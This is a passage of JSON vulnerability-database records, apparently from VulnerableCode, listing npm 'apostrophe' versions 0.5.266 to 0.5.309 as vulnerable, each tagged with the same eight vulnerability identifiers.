{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.266"},{"url":"http://public2.vulnerablecode.io/api/packages/268350?format=json","purl":"pkg:npm/apostrophe@0.5.267","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.267"},{"url":"http://public2.vulnerablecode.io/api/packages/268351?format=json","purl":"pkg:npm/apostrophe@0.5.268","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.268"},{"url":"http://public2.vulnerablecode.io/api/packages/268352?format=json","purl":"pkg:npm/apostrophe@0.5.269","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.269"},{"url":"http://public2.vulnerablecode.io/api/packages/268353?format=json","purl":"pkg:npm/apostrophe@0.5.270","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.270"},{"url":"http://public2.vulnerablecode.io/api/packages/268354?format=json","purl":"pkg:npm/apostrophe@0.5.271","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.271"},{"url":"http://public2.vulnerablecode.io/api/packages/268355?format=json","purl":"pkg:npm/apostrophe@0.5.272","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.272"},{"url":"http://public2.vulnerablecode.io/api/packages/268356?format=json","purl":"pkg:npm/apostrophe@0.5.273","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.273"},{"url":"http://public2.vulnerablecode.io/api/packages/268357?format=json","purl":"pkg:npm/apostrophe@0.5.274","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.274"},{"url":"http://public2.vulnerablecode.io/api/packages/268358?format=json","purl":"pkg:npm/apostrophe@0.5.275","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.275"},{"url":"http://public2.vulnerablecode.io/api/packages/268359?format=json","purl":"pkg:npm/apostrophe@0.5.276","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.276"},{"url":"http://public2.vulnerablecode.io/api/packages/268360?format=json","purl":"pkg:npm/apostrophe@0.5.277","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.277"},{"url":"http://public2.vulnerablecode.io/api/packages/268361?format=json","purl":"pkg:npm/apostrophe@0.5.278","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.278"},{"url":"http://public2.vulnerablecode.io/api/packages/268362?format=json","purl":"pkg:npm/apostrophe@0.5.279","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.279"},{"url":"http://public2.vulnerablecode.io/api/packages/268363?format=json","purl":"pkg:npm/apostrophe@0.5.280","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.280"},{"url":"http://public2.vulnerablecode.io/api/packages/268364?format=json","purl":"pkg:npm/apostrophe@0.5.281","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.281"},{"url":"http://public2.vulnerablecode.io/api/packages/268365?format=json","purl":"pkg:npm/apostrophe@0.5.282","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.282"},{"url":"http://public2.vulnerablecode.io/api/packages/268366?format=json","purl":"pkg:npm/apostrophe@0.5.283","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.283"},{"url":"http://public2.vulnerablecode.io/api/packages/268367?format=json","purl":"pkg:npm/apostrophe@0.5.284","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.284"},{"url":"http://public2.vulnerablecode.io/api/packages/268368?format=json","purl":"pkg:npm/apostrophe@0.5.285","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.285"},{"url":"http://public2.vulnerablecode.io/api/packages/268369?format=json","purl":"pkg:npm/apostrophe@0.5.286","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.286"},{"url":"http://public2.vulnerablecode.io/api/packages/268370?format=json","purl":"pkg:npm/apostrophe@0.5.287","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.287"},{"url":"http://public2.vulnerablecode.io/api/packages/268371?format=json","purl":"pkg:npm/apostrophe@0.5.288","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.288"},{"url":"http://public2.vulnerablecode.io/api/packages/268372?format=json","purl":"pkg:npm/apostrophe@0.5.289","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.289"},{"url":"http://public2.vulnerablecode.io/api/packages/268373?format=json","purl":"pkg:npm/apostrophe@0.5.290","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.290"},{"url":"http://public2.vulnerablecode.io/api/packages/268374?format=json","purl":"pkg:npm/apostrophe@0.5.291","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.291"},{"url":"http://public2.vulnerablecode.io/api/packages/268375?format=json","purl":"pkg:npm/apostrophe@0.5.292","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.292"},{"url":"http://public2.vulnerablecode.io/api/packages/268376?format=json","purl":"pkg:npm/apostrophe@0.5.293","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.293"},{"url":"http://public2.vulnerablecode.io/api/packages/268377?format=json","purl":"pkg:npm/apostrophe@0.5.294","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.294"},{"url":"http://public2.vulnerablecode.io/api/packages/268378?format=json","purl":"pkg:npm/apostrophe@0.5.295","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.295"},{"url":"http://public2.vulnerablecode.io/api/packages/268379?format=json","purl":"pkg:npm/apostrophe@0.5.296","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.296"},{"url":"http://public2.vulnerablecode.io/api/packages/268380?format=json","purl":"pkg:npm/apostrophe@0.5.297","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.297"},{"url":"http://public2.vulnerablecode.io/api/packages/268381?format=json","purl":"pkg:npm/apostrophe@0.5.298","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.298"},{"url":"http://public2.vulnerablecode.io/api/packages/268382?format=json","purl":"pkg:npm/apostrophe@0.5.299","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.299"},{"url":"http://public2.vulnerablecode.io/api/packages/268383?format=json","purl":"pkg:npm/apostrophe@0.5.300","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.300"},{"url":"http://public2.vulnerablecode.io/api/packages/268384?format=json","purl":"pkg:npm/apostrophe@0.5.301","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.301"},{"url":"http://public2.vulnerablecode.io/api/packages/268385?format=json","purl":"pkg:npm/apostrophe@0.5.302","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.302"},{"url":"http://public2.vulnerablecode.io/api/packages/268386?format=json","purl":"pkg:npm/apostrophe@0.5.303","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.303"},{"url":"http://public2.vulnerablecode.io/api/packages/268387?format=json","purl":"pkg:npm/apostrophe@0.5.304","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.304"},{"url":"http://public2.vulnerablecode.io/api/packages/268388?format=json","purl":"pkg:npm/apostrophe@0.5.305","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.305"},{"url":"http://public2.vulnerablecode.io/api/packages/268389?format=json","purl":"pkg:npm/apostrophe@0.5.306","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.306"},{"url":"http://public2.vulnerablecode.io/api/packages/268390?format=json","purl":"pkg:npm/apostrophe@0.5.307","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.307"},{"url":"http://public2.vulnerablecode.io/api/packages/268391?format=json","purl":"pkg:npm/apostrophe@0.5.308","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.308"},{"url":"http://public2.vulnerablecode.io/api/packages/268392?format=json","purl":"pkg:npm/apostrophe@0.5.309","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCI